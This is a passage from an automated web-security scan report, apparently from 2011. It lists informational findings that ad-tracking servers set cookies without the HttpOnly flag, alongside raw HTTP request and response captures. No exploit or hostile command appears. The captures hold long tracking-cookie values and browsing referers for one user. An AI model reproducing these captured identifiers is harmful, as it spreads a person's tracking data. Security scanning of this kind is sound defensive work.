Cookie: uid=uid=c0ff5dec-7e12-11e0-9b08-cbf09fb9c5c1&_hmacv=1&_salt=1421878035&_keyid=k1&_hmac=379127292d98a559f1aee3132eca164a08138d6d; ih="b!!!!#!1mH9!!!!#=!i98"; vuday1=%)0sHNDf0(n(#JG; pv1="b!!!!#!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~"; lifb=@Aum6=mRs]u7k!H; bh="b!!!!d!!!?J!!!!$=!iJp!!(1-!!!!#=!iJp!!/GK!!!!#=!iJp!!/GR!!!!#=!iJp!!/i,!!!!#=!i9E!!2)!!!!!#=!i9E!!4Rk!!!!#=!iBY!!<A!!!!!#=!iHg!!J<J!!!!$=!iJp!!J<K!!!!$=!iJp!!J<S!!!!$=!iJp!!Kc5!!!!#=!Y*a!!OgU!!!!#=!i9E!!Z+p!!!!#=!c8X!!]lj!!!!#=!iHg!!i5*!!!!#=!iJN!!itb!!!!$=!iJp!!jB6!!!!#=!iK0!!rms!!!!#=!c8X!!t^6!!!!%=!Tiu!!u*$!!!!#=!iJG!#$gc!!!!#=!iHg!#$k4!!!!#=!iHg!#*Xa!!!!#=!dNx!#+]S!!!!#=!i9E!#4^h!!!!#=!dNx!#6Ty!!!!#=!dNx!#8>+!!!!#=!i9S!#:<o!!!!#=!iJ:!#C@M!!!!#=!iK@!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTH!!!!$=!iJp!#MTI!!!!$=!iJp!#MTJ!!!!$=!iJp!#Mu_!!!!#=!eq^!#Nyi!!!!#=!eq^!#QfM!!!!#=!eq^!#SV*!!!!#=!i9E!#Sub!!!!#=!dNx!#Tw/!!!!#=!eq^!#UDQ!!!!$=!iJp!#UW*!!!!#=!dNx!#XV)!!!!#=!dNx!#XjF!!!!#=!eq^!#]<e!!!!#=!iHj!#^0%!!!!#=!i9E!#a]3!!!!#=!iJT!#b?f!!!!#=!iHc!#b?y!!!!#=!dNx!#biv!!!!#=!iK0!#dCX!!!!%=!c>6!#e9?!!!!#=!dNx!#g/7!!!!#=!i9E!#pI<!!!!#=!iHj!#q4c!!!!#=!iHl!#qVJ!!!!#=!eq^!#r-[!!!!#=!c8Z!$(Z`!!!!#=!iJp!$)ZR!!!!#=!i9S!$,gE!!!!$=!iQt"; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:56 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!!e!!!?J!!!!$=!iJp!!(1-!!!!#=!iJp!!/GK!!!!#=!iJp!!/GR!!!!#=!iJp!!/i,!!!!#=!i9E!!2)!!!!!#=!i9E!!4Rk!!!!#=!iBY!!<A!!!!!#=!iHg!!J<J!!!!$=!iJp!!J<K!!!!$=!iJp!!J<S!!!!$=!iJp!!Kc5!!!!#=!Y*a!!OgU!!!!#=!i9E!!Z+p!!!!#=!c8X!!]lj!!!!#=!iHg!!i5*!!!!#=!iJN!!itb!!!!$=!iJp!!jB6!!!!#=!iK0!!rms!!!!#=!c8X!!t^6!!!!%=!Tiu!!u*$!!!!#=!iJG!!x<K!!!!#=!iR#!#$gc!!!!#=!iHg!#$k4!!!!#=!iHg!#*Xa!!!!#=!dNx!#+]S!!!!#=!i9E!#4^h!!!!#=!dNx!#6Ty!!!!#=!dNx!#8>+!!!!#=!i9S!#:<o!!!!#=!iJ:!#C@M!!!!#=!iK@!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTH!!!!$=!iJp!#MTI!!!!$=!iJp!#MTJ!!!!$=!iJp!#Mu_!!!!#=!eq^!#Nyi!!!!#=!eq^!#QfM!!!!#=!eq^!#SV*!!!!#=!i9E!#Sub!!!!#=!dNx!#Tw/!!!!#=!eq^!#UDQ!!!!$=!iJp!#UW*!!!!#=!dNx!#XV)!!!!#=!dNx!#XjF!!!!#=!eq^!#]<e!!!!#=!iHj!#^0%!!!!#=!i9E!#a]3!!!!#=!iJT!#b?f!!!!#=!iHc!#b?y!!!!#=!dNx!#biv!!!!#=!iK0!#dCX!!!!%=!c>6!#e9?!!!!#=!dNx!#g/7!!!!#=!i9E!#pI<!!!!#=!iHj!#q4c!!!!#=!iHl!#qVJ!!!!#=!eq^!#r-[!!!!#=!c8Z!$(Z`!!!!#=!iJp!$)ZR!!!!#=!i9S!$,gE!!!!$=!iQt"; path=/; expires=Wed, 15-May-2013 01:53:56 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 01:53:56 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

13.56. http://ads.adbrite.com/adserver/vdi/684339 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/684339

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rb2=CjQKBjY4NDMzORj20p_7EiIkNGRkMDdiYzgtZTk3Yi0xMThjLTNkZWMtN2I4YzVjMzA2NTMwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; path=/; domain=.adbrite.com; expires=Sun, 14-Aug-2011 01:58:26 GMT
ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlCAfhpzZWjsxiurlJxDuGWHJXSIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 13-May-2021 01:58:26 GMT
vsd=0@1@4dd084c2@www.imiclk.com; path=/; domain=.adbrite.com; expires=Wed, 18-May-2011 01:58:26 GMT
rb=0:684339:20838240:4dd07bc8-e97b-118c-3dec-7b8c5c306530:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0; path=/; domain=.adbrite.com; expires=Sun, 14-Aug-2011 01:58:26 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.57. http://ads.lfstmedia.com/mark/CRITEO_INCL_US previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.lfstmedia.com
Path:	/mark/CRITEO_INCL_US

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

adm_8vhk7crnCultFM-9vPQgMQ=y1CPY_PMEQyXEGd0ba8GKWzq0JvFcZ8d2in7RLYOb7s+zdbkfv7ihR8pX3gyu+6g; Domain=.lfstmedia.com; Expires=Thu, 13-May-2021 02:03:00 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.58. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_L-X0="MLsXsF8OZi5n4BC7CEQANzy/1tkH/1R6T7S5z2Fu/1ZdyDcMqjB3UfR+EgHU8X4ksrVgy/Rz8x5trlkaRECoNMLefiivRJt2FSces26J094xJ83B/839DFleaBDLRohSlAV8cpPInIvVz89Y7xsejcWODt9R/gyFvKssIz6J1ZKnfIDZnh498xJl7+/KNV8X6NaOn5sOc/2crutdINmb6SjYm5/o39bKqJ3lsv/ufqykgLW6bFGCdxMIct6rbb03ZFShfm9rBIi4EFNh71KUzfigSzTGIl979lRdhOaxbsRsHH/IHdX3B6eZu5yScSdoRXhv4T+NLxAHJeaSWhd2iSuscBVEm14yRic99IhVBxJCQAQfxVHWrrWMmcSIot2Xc9zXZmllbUJ5MUniuwtpDzfMfJGkIdV2LYIBTuaw56nZrsRqAQQu1rdWet9dyZycwRd1bxIYIaFo+WI="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJE+jMAYYlW2Evr0qOsoHgT7/5aCXkF76a5ePIMnACJA/zkSMZZZuo+iFozW34dnftER/2bN/1fhchSGk4TkgcNOSojrggJL3ZFtV5Dd9oVCaXJbX8pxgD0MiS7mTwQUeKRExmwD2TqDTsb4XdEuaU/leOWPzn1cdd1EBG9jdUFd+SR9ASj5vXqfp4Bx8r3MacxU5b0lfv7P581V3c5dlIjXXSV52gJZMBjFjopQWNVNDDgiaUGOlUCF9e1Z8U3nqZACYtYsTSct7T7Y2dQQyK6yaRz20ruhMzz0i0MLM5FR2b4SR1zi+MNvt3aFe6ba85gDmG5K/e5ZKvT7wP3TplRP+VPkcshnnvkHEgQSwZQ4Sdl0azi6K8eSEhn1prYcA2h/AJWUuemh2PflYDgWQWEawPoOsxaaMNfquZindF2tuVM3T3nYy1lhqDS6tj2PMjilZqVGYsvpW4D1W5BBVupLWtXnqbJFOmYsdZ/uYPTEFb8i6Vw8fCPfpx/jFJBwkcZ/Dvh8sVo2JGo6WH+tdG6c7W9EOOlONQ3XBE44lm2eOm03FqV/yP12N22/soxYzWkkBJ1HHE0dhhYDQLR3+MTSnq5JuljXXQ1R5O/lQ2bC8UjtGuBp7MxQi0jXgyjFmZ4sM4jC1HScaAozIsxMmRYw6fR4+OT1F2175YEAMBwIFF6geXyFxNriAcnRIyIy2XmUUzOk07F2aj0fQQKXeRpsruDRmKI9ryjbmaB6Nxcvm3R3N4h3COgmMy9CGSQkalvvwJgLreKo3tjctopQJuSKMpesYQbKl9jj50Pae3gOxuKfOMq5zif7fK0dsDFjuyb2eZQyBbjsZVV68AzmX9MxiEcEhGwgvNfRJ7b8mvtAdjWUr35gJvb/evgZux7lLgRothRSCjmbzJFqqYiEmizTr4kfqFOR+CHcxk0s57o2j5758Z9B9kChcIW/FNWdjusFHa9qy0bgpzErI83/uwfWGtvBTd6wlqo/kNu60lhyd2TsufCmaFlQnDsvcSvFmWFdJjexUCTffup1s6pZ8mOPN9PZDM+cmF6XKMGta3Bv2og=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=47C4A5B52F56DA1048BE0364F22EE23B&rsi_site=7CF6289AC01B12B6FAA4EB07CBB7EE34&rsi_event=D00B721BDB5235B5FF65F9D8E524EF85 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv39S8JaSpnph4dB7K/U2jMrlZxPiFsbBfSBcrlROJywhuHqR1r/UA1T0iRssIdAE9WG5SkuBEsQUD3IuuN09ImomKQMeFq1jtxllLl2hNvJ93zI8nQT72tjMgtUdO//9wYgRqB8ZXuPro+o7BxsBR5pxD7EXVtXGydBkVQEudXG2D2wIkNBeqHmIWJj+bGrdjGRyWixast+xLN0K4Iw+ew6ThmTEKns4HxFbcBnFLmChGZ934MWdGZXXYRWuhxS3cwBXNGIONtB2mXemfgyEqzd2IBmI9G7wogGLDx8Lw0DAp53p7JuTlqcYDDCICXYM9H2ZnYlIi4JrCJzCy8WcgNq18GmmzuaTOz/CYt2C7l9cgcwecxI15dlo8KJWy8mdmvMATQlBQZvvshGx7/ZWO+n5+L+o3XoVAx3gT2aCZHqJjly/K2Xoj1Qw67qH0PuJYpMK5P/KiQ3zOVyfP/ypI3utDRIhc08fTvQR/OwZZuegUWhFE/sq9FQhAzxOxIUTEvSResbfdfBhvTYofAJyTSyywbmhBb1MDtD0AFkYRyczjrYj2sKaFHZRb4fmzvPKfH6Zk5gmTLJV0gMS1UqtVy/S2L8TpN/clrGMHfxjNSPD5FT/EJtkm0EFhEQ27Z/cReQRxmltlL0MzcDhcs4e/wDwceblUp0um7chLLj/9/l1yBXBuwEgHk1flpVPkRmS/XI+a+2dCRvFnQSugMULpDNrA24o1pFVOIWNzLGZT2Krf+nzgF5TV38bNdoImSe5zwcruCXUG2Ktx5bQZtk7hjyijC/wmaioSX0PWNvks1FPlRUSXt/go8LnugdkWwYNOashsf6bBdytaAhOmPeOITWXSATA4ZE5SyPxGC0Znb3KDFATW1t50eAoudsHBsRbGRnxbn5H9cjPONtxL7egOM2+ltX2Nj9k3QVOzWzXEbkqT5akyVl21my7/DhratEWYI71JWlJ+9P5DWoLAVAyHTfXhezKMST83PEAtbhYhRavvp7A==; rsi_segs_1000000=pUPNcDPB7QMUFVJmHElW1WAhFpB0I5EmV+QHrdRrcAMkOX+o7LQjAQv0aGumjYcA+pD55MfuOfQbGooH3qorp++zHuX/61m4ao1z4yL4Lb3cyf2EkQb/3ZOSwdnh6MSu2Um4QVZJKClGNz2Fl9QeLKxco3pM/j3xxqXi/RBfDYQLHw069nJi4GhHujSDyULrAXw98qMzqzoEqWE=; rtc_6axN=MLsvrdMvcT5jJQFErn5VSDYGHlHr5G4IUDwGBCOQN50vl8AxTgkQ69k2sWbYhD5swupGFuttZZ30pjREZ/ZkKkhmVOC4XP9dHEpHAm3ADaku92HBduCPjDheEZyi3USKjMyJU8PKvSGf6dbgKbkkF1T9nPoTyICKBODL5dWNTWGJSo//SZoNqh0jXWrCVj5fE0hG1/Ew1855Q3kGOJISwLZwyFyrdDpPp9pEr5K7YRGtS1DhqDKb+B3xI4h5pUmK196H1VYARyez77DbY8fCN3YqmgkgAm74R4TtPLq8byYJ7dh3Jpzg7zgqcfYD+8HJFFf4m0VurVwRBH7s; rsiPus_Ue6V="MLsfsF8OZi5n4JASs5Bk9KNTJTvS8f2Fu11GHPEzhKyi3GQrQ7BmTve2OJAm5dkicVDq6exz8/7mVp8gLWwFrCZXqjnrP4dY+oskzV6Lm6fDGU/pc7sD4QgyAm917NYUdYZyl4Ge77s9UIFZQ17LzY6FmFr+dbOm/q3NRviYsxYxEdT4BuWckICBhlynfvy70YiGCMlO6qasmF2ihg+pO2oJnW6u/sK+jrGeJcPD5bkfmxdZkcxFCdRcP+5WTqdsCmcLf0Ex4rcKXrvjrnu0sTHtBT5McF9fDxSJ/5F4rhGctF7ufabWD//giGZVhajmlKJ5/ghKjM+xp5IlgyRWbpVdfNtrcTGZkm4rs+yrKxT60qWH9+m+GDthRw4NqX5srVtjKqBYmXFoYwBh69bL8neIN/fo324IeUZkNTAbckLX2a5MG66S3qymz5fMI7YY007gYORN"; rsi_us_1000000="pUMdJE1HMBYc1A1qdrcIJDxQsPOLjDoxzTAyNtIHury3GtT68G8x1wl2w/HHUtqHQsCeBaP1P6FXhHb2gFvElddwSHYuHGTrUzB1JmqVJnWnfFraXAJ0HXSsWsKsenfLwmMuKZfjvBEQWNpdP7FfD8xp5hLRMwezltge4Do9QX1mZyppg6fuXPp4j9WR9yOzLIEyFyYvYnmhyaVpmd2KE5SMk4UkzjeJic7ys+Ry7RIyWuckExTC3z42TMmr1xnTwvQxn6DymxrH6BA8apr+dsG+HX4oH3b2M5RjVR9OEduFKxCoKYg3hqhEwyrtCz0XpgfqRX4gqNohc1/W2RnNT975CgaLAwjh11y5uqnDue9wUha5TfzEIxMAivPyPaOEYCti+DNtlXFK/0jfGgfxlCevyrLhnDrN9WTkWTTkovOWctoce/yYdYwnZjyAK/WrNLPaLcyahlyzYtXLzEW2+TB6t7lvfvkKKVoTjyd4+fq/G/OzWz/okwSYqsojVcuOKXZfkvZQFM+uZ7jdB58SXgHb34YzYLTOk4Oqpvvtbh8FiVnclF92CFDfw8dICduFuGmKuoygMWLbrVVOdFM+aW/0MIZPT47Y8WbzHfFrk3FeGzSTYzL9KCoaL+xOhl9sHKdX2YJ5S2NsdXMCRPfLV1GAMP4xC+NpacNHSzF0laIoxYEIa/ODB2HQ2uznY9aWOpFh+wcRIXA8Eo1bmEftV4VMIPjGcSoikr9RSBZ0GzGq+KYm17TfZzW85AnXZZMkWMAzBqSS0J7jIKDrJPSeuTPgBB2gffcvWmJT0GdRXvgBEVFgEi7KVR8PyfjcHGSqmBKdP1LCkTSqLigTCBX9xnHOu2x1pnCXrkbZavqIN2ckvtAdbWIr3/gJvX/efgFmx6k3gdoqrRSCjkazJNqrZiEmZRpOkGChbBt6n2xW6mdY0EYYU85F0+JxyWlaMlMzMJlE5djHMETBllGwYzgApDsNyhbc007zWOjl31mNUCRbmDJBE9Sj45uNmsYg4hAkOLV2WFVOj+5UKDffup1s6paMmFPN9PB7E+cmdyXEMGtKOnL1ng=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ue6V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ue6V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_L-X0="MLsXsF8OZi5n4BC7CEQANzy/1tkH/1R6T7S5z2Fu/1ZdyDcMqjB3UfR+EgHU8X4ksrVgy/Rz8x5trlkaRECoNMLefiivRJt2FSces26J094xJ83B/839DFleaBDLRohSlAV8cpPInIvVz89Y7xsejcWODt9R/gyFvKssIz6J1ZKnfIDZnh498xJl7+/KNV8X6NaOn5sOc/2crutdINmb6SjYm5/o39bKqJ3lsv/ufqykgLW6bFGCdxMIct6rbb03ZFShfm9rBIi4EFNh71KUzfigSzTGIl979lRdhOaxbsRsHH/IHdX3B6eZu5yScSdoRXhv4T+NLxAHJeaSWhd2iSuscBVEm14yRic99IhVBxJCQAQfxVHWrrWMmcSIot2Xc9zXZmllbUJ5MUniuwtpDzfMfJGkIdV2LYIBTuaw56nZrsRqAQQu1rdWet9dyZycwRd1bxIYIaFo+WI="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE+jMAYYlW2Evr0qOsoHgT7/5aCXkF76a5ePIMnACJA/zkSMZZZuo+iFozW34dnftER/2bN/1fhchSGk4TkgcNOSojrggJL3ZFtV5Dd9oVCaXJbX8pxgD0MiS7mTwQUeKRExmwD2TqDTsb4XdEuaU/leOWPzn1cdd1EBG9jdUFd+SR9ASj5vXqfp4Bx8r3MacxU5b0lfv7P581V3c5dlIjXXSV52gJZMBjFjopQWNVNDDgiaUGOlUCF9e1Z8U3nqZACYtYsTSct7T7Y2dQQyK6yaRz20ruhMzz0i0MLM5FR2b4SR1zi+MNvt3aFe6ba85gDmG5K/e5ZKvT7wP3TplRP+VPkcshnnvkHEgQSwZQ4Sdl0azi6K8eSEhn1prYcA2h/AJWUuemh2PflYDgWQWEawPoOsxaaMNfquZindF2tuVM3T3nYy1lhqDS6tj2PMjilZqVGYsvpW4D1W5BBVupLWtXnqbJFOmYsdZ/uYPTEFb8i6Vw8fCPfpx/jFJBwkcZ/Dvh8sVo2JGo6WH+tdG6c7W9EOOlONQ3XBE44lm2eOm03FqV/yP12N22/soxYzWkkBJ1HHE0dhhYDQLR3+MTSnq5JuljXXQ1R5O/lQ2bC8UjtGuBp7MxQi0jXgyjFmZ4sM4jC1HScaAozIsxMmRYw6fR4+OT1F2175YEAMBwIFF6geXyFxNriAcnRIyIy2XmUUzOk07F2aj0fQQKXeRpsruDRmKI9ryjbmaB6Nxcvm3R3N4h3COgmMy9CGSQkalvvwJgLreKo3tjctopQJuSKMpesYQbKl9jj50Pae3gOxuKfOMq5zif7fK0dsDFjuyb2eZQyBbjsZVV68AzmX9MxiEcEhGwgvNfRJ7b8mvtAdjWUr35gJvb/evgZux7lLgRothRSCjmbzJFqqYiEmizTr4kfqFOR+CHcxk0s57o2j5758Z9B9kChcIW/FNWdjusFHa9qy0bgpzErI83/uwfWGtvBTd6wlqo/kNu60lhyd2TsufCmaFlQnDsvcSvFmWFdJjexUCTffup1s6pZ8mOPN9PZDM+cmF6XKMGta3Bv2og=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1052401&t=2
Content-Length: 0
Date: Mon, 16 May 2011 01:58:30 GMT

13.59. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_8Tdl="MLsfsN8vLi5noAD7UlKmCeGhAP46rO3VGVkG3cTC//hXKAVhzgsM6n2u8NRAWCkwlkp7R909rxgJCSUtdP90+WpBKh3IxnnSa60vjSMgeM3M44P2Q1ZKaAXQA4Udgxl7mFn8VFA6ipHDpoTUG7C9O4Pgwrt6fMYG/9KOBspe5ouFNDa0I7gFKjQsrEteLApaz6BmjLdCFyzK2wedlrfj6DaeG4uph8ScspDLsRtN7zgovFWn//4xxFM0gmMmOEDx6mFpU1ph1l7pmfjORzRcqnchOSoFOGsUDQhhACxTEZ4J13w5/3NSjHEjPNR07flIaq05tjTIfQZutqXMdI6DW89PNtY8I2NGUxNCbLkconRe3ooHr9Swk6WnhMhNRTkI5FBYw1wZ9yH3LpE69Xhru4gA29szeKRgLSKhYqAoD4rBu6sD2BKS56+x62mm6B5tLFus+g=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJE1HMBYc1A1qdrcIJDxQsPOLjDoxzTAyNtIHury3GtT68G8x1wl2w/FHOQ/3m1TMxQXtpPTY8fzxzQOBeO684d/jQXWEgaK2R2azl85fUjtK5ppvPF7qk2Vr6bPPmSLwphIhajDBl0rnMASBSRnSA8xpTxeM8XzyCQN5TIxZ/s/aZ5XnGxJxUXcZRLdXBHwHByl6GjhIRC5n29D7kavYdN3qHN067tuh4CDbjWHZdTUvEuVr23mdHzW8yzODK3m6vgHsu1kgSSqpQz70pwaPumeLTWUxOPeBw9zt8qvD+QM5nom0E7zgIyrBi+4MPVWykC5jJT0hirtdxJf16/D1kQSjC7lXzFwzmTGzbqBFVDZzp7Js6mgo5TvULYFQpGvTyC8PK6mLXr2nCU/nXAmAOt3bjs1cUDhPSfryi1ki9m18xO50tPZic3KFyD7mUMUTo11xkNFkmtQ0ak0Ddw2OOm4XjS9UNoeKONnaTN7hpy1ub3Qsq2v4VKdakoR3Z+6860bM9tT5ZGCTMBBbojyO8DznzR+wyGUYzy5iwxT8wQ6L8ziZzQYge0ny0CEHBzXMOOUJ6F+sJcHphZUAKXYhqr4nioB2oe7kwRXoBeRITYepdRPWM+wuiHH5pL7B+BzYk6YgIfDqNVzD8AVH1fs+3PkRwHVqPInmyKtgJtcBsSEE6isuPUnMIk9uewP9gyI25nrfM+xgiSJaURZYOeh64cPGKyPynabpuplK9dVjEmyyHwdTodTFbyIAAmooYKgKS2eXuWhJuYbv5AuB8Ari+Tj5AbYFJszJ7DDQtfaOdhpShAHERDrQaK4MppXYRzA6yrVm3vG/FhKVgwg2tpjGgO/+r32Y9Zm6Xk5N16frL9RXFo7PRggasG1LLW/N8pIXUZklt2gXs4tWonag4SY7fzSCSLQnfFYbZS0C9g4ZQQJxpOTTkqEweKtTBlPIpNfRRbwI5vs3nWuPg8gCnCY5PUzOIT8S1kAlHovix7kguSt5/64A0p0bJlGt+Gc+2cNCNKeRZnnrXGoEIIfMDxUZJ5ctMfFVk8nGKBUGP7gt8ZfAGFI="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=9342936133034.527?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv39S8JaSpnph4dB7K/U2jMrlZxPiFsbBfSBcrlROJywhuHqR1r/UA1T0iRssIdAE9WG5SkuBEsQUD3IuuN09ImomKQMeFq1jtxllLl2hNvJ93zI8nQT72tjMgtUdO//9wYgRqB8ZXuPro+o7BxsBR5pxD7EXVtXGydBkVQEudXG2D2wIkNBeqHmIWJj+bGrdjGRyWixast+xLN0K4Iw+ew6ThmTEKns4HxFbcBnFLmChGZ934MWdGZXXYRWuhxS3cwBXNGIONtB2mXemfgyEqzd2IBmI9G7wogGLDx8Lw0DAp53p7JuTlqcYDDCICXYM9H2ZnYlIi4JrCJzCy8WcgNq18GmmzuaTOz/CYt2C7l9cgcwecxI15dlo8KJWy8mdmvMATQlBQZvvshGx7/ZWO+n5+L+o3XoVAx3gT2aCZHqJjly/K2Xoj1Qw67qH0PuJYpMK5P/KiQ3zOVyfP/ypI3utDRIhc08fTvQR/OwZZuegUWhFE/sq9FQhAzxOxIUTEvSResbfdfBhvTYofAJyTSyywbmhBb1MDtD0AFkYRyczjrYj2sKaFHZRb4fmzvPKfH6Zk5gmTLJV0gMS1UqtVy/S2L8TpN/clrGMHfxjNSPD5FT/EJtkm0EFhEQ27Z/cReQRxmltlL0MzcDhcs4e/wDwceblUp0um7chLLj/9/l1yBXBuwEgHk1flpVPkRmS/XI+a+2dCRvFnQSugMULpDNrA24o1pFVOIWNzLGZT2Krf+nzgF5TV38bNdoImSe5zwcruCXUG2Ktx5bQZtk7hjyijC/wmaioSX0PWNvks1FPlRUSXt/go8LnugdkWwYNOashsf6bBdytaAhOmPeOITWXSATA4ZE5SyPxGC0Znb3KDFATW1t50eAoudsHBsRbGRnxbn5H9cjPONtxL7egOM2+ltX2Nj9k3QVOzWzXEbkqT5akyVl21my7/DhratEWYI71JWlJ+9P5DWoLAVAyHTfXhezKMST83PEAtbhYhRavvp7A==; rsi_segs_1000000=pUPNcDPB7QMUFVJmHElW1WAhFpB0I5EmV+QHrdRrcAMkOX+o7LQjAQv0aGumjYcA+pD55MfuOfQbGooH3qorp++zHuX/61m4ao1z4yL4Lb3cyf2EkQb/3ZOSwdnh6MSu2Um4QVZJKClGNz2Fl9QeLKxco3pM/j3xxqXi/RBfDYQLHw069nJi4GhHujSDyULrAXw98qMzqzoEqWE=; rtc_6axN=MLsvrdMvcT5jJQFErn5VSDYGHlHr5G4IUDwGBCOQN50vl8AxTgkQ69k2sWbYhD5swupGFuttZZ30pjREZ/ZkKkhmVOC4XP9dHEpHAm3ADaku92HBduCPjDheEZyi3USKjMyJU8PKvSGf6dbgKbkkF1T9nPoTyICKBODL5dWNTWGJSo//SZoNqh0jXWrCVj5fE0hG1/Ew1855Q3kGOJISwLZwyFyrdDpPp9pEr5K7YRGtS1DhqDKb+B3xI4h5pUmK196H1VYARyez77DbY8fCN3YqmgkgAm74R4TtPLq8byYJ7dh3Jpzg7zgqcfYD+8HJFFf4m0VurVwRBH7s; 